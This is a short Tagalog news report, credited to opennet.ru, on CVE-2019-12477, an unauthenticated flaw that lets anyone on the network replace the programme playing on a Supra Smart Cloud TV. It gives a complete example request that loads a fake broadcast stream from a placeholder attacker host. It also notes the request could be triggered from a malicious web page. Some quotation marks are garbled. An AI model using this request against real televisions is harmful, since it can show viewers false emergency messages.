Sa Supra Smart Cloud TV kahinaan (CVE-2019-12477) na nagbibigay-daan sa iyong palitan ang kasalukuyang tinitingnang programa ng nilalaman ng umaatake. Bilang halimbawa, ipinakita ang output ng isang gawa-gawang babala tungkol sa isang emergency na sitwasyon.
Para sa isang pag-atake, sapat na upang magpadala ng isang espesyal na ginawang kahilingan sa network na hindi nangangailangan ng pagpapatunay. Sa partikular, maa-access mo ang handler ng β/remote/media_control?action=setUri&uri=β sa pamamagitan ng pagtukoy sa URL ng m3u8 file na may mga parameter ng video, halimbawa βhttp://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.β
Sa karamihan ng mga kaso, ang pag-access sa IP address ng TV ay limitado sa panloob na network, ngunit dahil ang kahilingan ay ipinadala sa pamamagitan ng HTTP, posible na gumamit ng mga paraan upang ma-access ang mga panloob na mapagkukunan kapag ang user ay nagbukas ng isang espesyal na idinisenyong panlabas na pahina (halimbawa, sa ilalim ng ang pagkukunwari ng paghiling ng larawan o paggamit ng ).
Pinagmulan: opennet.ru